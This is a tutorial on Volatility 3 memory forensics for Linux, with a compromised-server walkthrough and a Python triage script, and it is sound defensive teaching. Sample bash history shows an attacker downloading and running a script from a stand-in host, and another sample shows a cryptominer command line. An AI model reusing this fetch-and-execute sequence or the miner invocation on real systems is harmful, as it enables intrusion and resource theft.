Volatility 3 is a complete rewrite of the Volatility framework for RAM dump analysis (see the Volatility 2 article for background). The biggest change: no more profiles. Volatility 3 reads data structures directly from kernel Symbol Tables, eliminating the manual profile selection that was error-prone in v2.

What Changed Compared to Volatility 2?

Feature         Volatility 2            Volatility 3
Language        Python 2/3              Python 3 (exclusively)
Profiles        Required, manual        Automatic (Symbol Tables)
Command         volatility              vol (or vol3)
Plugin syntax   --profile=X pslist      linux.pslist (hierarchical)
Performance     Slower                  Significantly faster
Architecture    Monolithic              Modular, easy to extend

Installation

Volatility 3 requires Python 3.7 or newer.

# Clone the repository
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3

# Install dependencies
pip3 install -r requirements.txt

# Verify it works
python3 vol.py -h

Installing Symbol Tables

Volatility 3 needs Symbol Tables matching the kernel version from the analyzed dump. For Linux, you can generate them yourself using the dwarf2json tool, or download pre-built ones from the project’s website.

# Download pre-built symbol tables for Linux
# Place them in the volatility3/symbols/ directory
ls volatility3/symbols/linux/

If Volatility 3 can’t find the appropriate table automatically, it will display an error message specifying the exact kernel version it’s looking for.

New Syntax — Key Plugins

In Volatility 3, plugins are organized hierarchically by operating system. For Linux, every plugin name starts with the linux. prefix:

Listing Processes

# Volatility 2 (old syntax):
# volatility -f dump.raw --profile=Linux_X pslist

# Volatility 3:
vol -f dump.raw linux.pslist

Process Tree

vol -f dump.raw linux.pstree

Network Connections

vol -f dump.raw linux.sockstat

Loaded Kernel Modules

vol -f dump.raw linux.lsmod

Open Files

vol -f dump.raw linux.lsof

Bash Command History

vol -f dump.raw linux.bash

Mounted Filesystems

vol -f dump.raw linux.mountinfo

Process Environment Variables

vol -f dump.raw linux.envars

Practical Example: Analyzing a Compromised Server

Scenario: Your server is behaving suspiciously — CPU load is high with no visible cause. You managed to capture a memory dump using LiME:

# Capturing memory on a live system
sudo insmod lime-$(uname -r).ko "path=/tmp/dump.raw format=raw"

Now let’s analyze the dump:

1. Listing processes:

vol -f /tmp/dump.raw linux.pslist
PID     PPID    COMM
1       0       systemd
...
4821    4820    kworkerds
4825    4821    kworkerds

We see a suspicious process kworkerds — a name deceptively similar to the legitimate kernel thread kworker, but it’s a separate process with its own PID and PPID.

2. Checking launch arguments:

vol -f /tmp/dump.raw linux.cmdline --pid 4821
PID     ARGS
4821    /tmp/kworkerds -o stratum+tcp://pool.minero.cc:5555 -u wallet123

It’s a cryptocurrency miner communicating with a mining pool.

3. Checking network connections:

vol -f /tmp/dump.raw linux.sockstat

The kworkerds process is maintaining an active TCP connection on port 5555 to an external IP address.

4. Finding out how the attacker got in:

vol -f /tmp/dump.raw linux.bash
PID     COMM    COMMAND
1102    bash    wget http://malicious.site/payload.sh -O /tmp/payload.sh
1102    bash    chmod +x /tmp/payload.sh
1102    bash    /tmp/payload.sh

The bash history reveals that the attacker downloaded and executed a malicious script.
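The four checks above can be scripted over Volatility 3's JSON renderer output (`vol -r json -f /tmp/dump.raw linux.pslist`, and likewise for linux.cmdline). The script below is an added example, not code from this article or from the Volatility project; it assumes the JSON rows are keyed by the column names shown in the output above (PID, PPID, COMM, ARGS) and runs on constructed rows mirroring the scenario. The kernel-thread check generalizes the kworkerds observation: genuine kernel threads are all children of kthreadd (PID 2), so a kernel-thread-looking name with any other parent is worth a closer look.

```python
import json
import re

# Prefixes of genuine kernel-thread names. Real kernel threads are children of
# kthreadd (PID 2); kthreadd itself is the only one whose parent is PID 0.
KTHREAD_PREFIX = re.compile(r"^(kworker|ksoftirqd|kswapd|migration|rcu_|kthreadd)")
KTHREADD_PID = 2
# URL scheme used by mining-pool clients, as seen in the cmdline output above.
STRATUM = re.compile(r"stratum\+(tcp|ssl)://", re.IGNORECASE)


def lookalike_kernel_threads(pslist_rows):
    """Return (PID, PPID, COMM) for processes named like a kernel thread whose
    parent is not kthreadd: the kworkerds pattern from the scenario above."""
    suspects = []
    for row in pslist_rows:
        pid, ppid, comm = row["PID"], row["PPID"], row["COMM"]
        if pid != KTHREADD_PID and KTHREAD_PREFIX.match(comm) and ppid != KTHREADD_PID:
            suspects.append((pid, ppid, comm))
    return suspects


def miner_cmdlines(cmdline_rows):
    """Return (PID, ARGS) for command lines that point at a stratum mining pool."""
    return [(r["PID"], r["ARGS"]) for r in cmdline_rows if STRATUM.search(r.get("ARGS") or "")]


def triage(pslist_json, cmdline_json):
    """Run both checks over the JSON renderer output and report PIDs hit by both."""
    suspects = lookalike_kernel_threads(json.loads(pslist_json))
    miners = miner_cmdlines(json.loads(cmdline_json))
    both = sorted({s[0] for s in suspects} & {m[0] for m in miners})
    return {"lookalikes": suspects, "miners": miners, "confirmed": both}


# Constructed sample rows mirroring the scenario above; column names follow the
# pslist/cmdline headers shown there (assumed to be the JSON keys as well).
PSLIST_JSON = json.dumps([
    {"PID": 1, "PPID": 0, "COMM": "systemd"},
    {"PID": 2, "PPID": 0, "COMM": "kthreadd"},
    {"PID": 15, "PPID": 2, "COMM": "kworker/0:1"},
    {"PID": 4821, "PPID": 4820, "COMM": "kworkerds"},
    {"PID": 4825, "PPID": 4821, "COMM": "kworkerds"},
])
CMDLINE_JSON = json.dumps([
    {"PID": 15, "ARGS": None},
    {"PID": 4821, "ARGS": "/tmp/kworkerds -o stratum+tcp://pool.minero.cc:5555 -u wallet123"},
])

if __name__ == "__main__":
    print(json.dumps(triage(PSLIST_JSON, CMDLINE_JSON), indent=2))
```

The child process 4825 is flagged by name only; its own command line is empty in the sample, which is why the report separates name-based suspects from PIDs confirmed by a mining-pool argument.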

Useful Options

  • Filtering by PID: Most plugins accept --pid to narrow results to a specific process:

    vol -f dump.raw linux.lsof --pid 4821
    
  • Dumping a binary from memory: To extract a suspicious binary for further analysis:

    vol -f dump.raw linux.elfs --pid 4821 --dump
    
  • Listing available plugins:

    vol -f dump.raw linux --help
    

Volatility 3 vs Live Tools

It’s worth remembering how memory dump analysis differs from tools running on a live system:

  • ps, top, ss — can be fooled by rootkits that hide processes.
  • Volatility 3 analyzes raw memory — a rootkit running on the system cannot interfere with offline analysis the way it can with live tools.
  • A memory dump is a “frozen” state — nothing changes during analysis, unlike on a live system.

Volatility 3’s automatic symbol resolution and hierarchical plugin system make it significantly easier to use than v2, especially for Linux analysis.